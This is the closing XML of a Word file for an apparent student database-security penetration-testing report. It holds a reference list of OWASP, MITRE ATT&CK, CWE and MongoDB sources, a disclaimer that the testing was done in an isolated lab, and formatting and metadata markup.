        <w:t>OWASP — SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFDB896" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>OWASP — Testing for NoSQL Injection: https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029F1ED9" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK — T1190 Exploit Public-Facing Application: https://attack.mitre.org/techniques/T1190/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6F21D5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK — T1059 Command and Scripting Interpreter: https://attack.mitre.org/techniques/T1059/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71A84C" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK — T1005 Data from Local System: https://attack.mitre.org/techniques/T1005/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725233C3" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CVSS v3.1 Specification Document: https://www.first.org/cvss/specification-document</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5698BCF8" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CWE-89 — Improper Neutralization of Special Elements in SQL: https://cwe.mitre.org/data/definitions/89.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C965D1F" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>CWE-943 — Improper Neutralization of Special Elements in Data Query Logic: https://cwe.mitre.org/data/definitions/943.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7F3EBB" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>MongoDB Documentation — Query Operators: https://www.mongodb.com/docs/manual/reference/operator/query/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F968F48" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Lockheed Martin Cyber Kill Chain: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E03A708" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Repository — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>-security-lab: https://github.com/mennatallahkhalifa/db-security-lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BAAB4" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="0F40C291" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00E13696"/>
    <w:p w14:paraId="4274DBDD" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="1B3A6B"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="60"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5D6D7E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>This report was produced for educational purposes as part of Assignment 1 of CN5134 Database Security, Ain Shams University, Spring 2026. All exploitation was performed in an isolated Docker lab environment.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E13696">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D5687" w14:textId="77777777" w:rsidR="004C33B5" w:rsidRDefault="004C33B5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="63475EF2" w14:textId="77777777" w:rsidR="004C33B5" w:rsidRDefault="004C33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058B5" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="1B3A6B"/>
      </w:pBdr>
      <w:spacing w:before="80"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">CONFIDENTIAL — FOR EDUCATIONAL USE </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>ONLY  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  Page </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008669D2">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="008669D2">
      <w:rPr>
        <w:noProof/>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7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ADBF8" w14:textId="77777777" w:rsidR="004C33B5" w:rsidRDefault="004C33B5">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7CF56B42" w14:textId="77777777" w:rsidR="004C33B5" w:rsidRDefault="004C33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50559" w14:textId="77777777" w:rsidR="00E13696" w:rsidRDefault="00000000">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="1B3A6B"/>
      </w:pBdr>
      <w:spacing w:after="80"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">DB Security Lab — Penetration Testing </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>Report  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="5D6D7E"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  CN5134 · SEC304 · Ain Shams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4700D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C4AC6E52"/>
    <w:lvl w:ilvl="0" w:tplc="CEBCAF3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="77045A0C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F4AE59EE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="51685D3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3DEE670E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E64468AA">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="C00ACA6E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="994C8CB8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D4CE8CBE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="19980265"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59A2FECA"/>
    <w:lvl w:ilvl="0" w:tplc="11B47EB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="BAEC624A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="33B880A6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="DCB0EF82">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CED8CD90">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="AA6ED0CA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="65D4D1DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="9FA86704">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="8B8CE1CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A26351D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0A0C664"/>
    <w:lvl w:ilvl="0" w:tplc="A3FC7B64">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="096CECC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="A77CC59E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E74A9484">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="16FC3244">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="A3EAC44E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="7A44069C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EF44C74E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="90A6D654">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1" w16cid:durableId="898855878">
    <w:abstractNumId w:val="1"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="390420538">
    <w:abstractNumId w:val="0"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="112716625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696"/>
    <w:rsid w:val="000E3D7F"/>
    <w:rsid w:val="00181D5E"/>
    <w:rsid w:val="001E207A"/>
    <w:rsid w:val="002D3A3C"/>
    <w:rsid w:val="002E0B03"/>
    <w:rsid w:val="004C33B5"/>
    <w:rsid w:val="006304B2"/>
    <w:rsid w:val="006553EE"/>
    <w:rsid w:val="008669D2"/>
    <w:rsid w:val="00872AAE"/>
    <w:rsid w:val="009C19FB"/>
    <w:rsid w:val="00AC12E9"/>
    <w:rsid w:val="00E13696"/>
    <w:rsid w:val="00E255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935F3"/>
  <w15:docId w15:val="{C1325E2D-4288-4026-AC05-B17AFD6D2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3A6B"/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="300" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="1B3A6B"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="200" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:color w:val="5D6D7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12</Pages>
  <Words>2737</Words>
  <Characters>17659</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>679</Lines>
  <Paragraphs>522</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>19874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ساره عبدالله سليمان عبدالله خميس</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-18T10:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-19T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>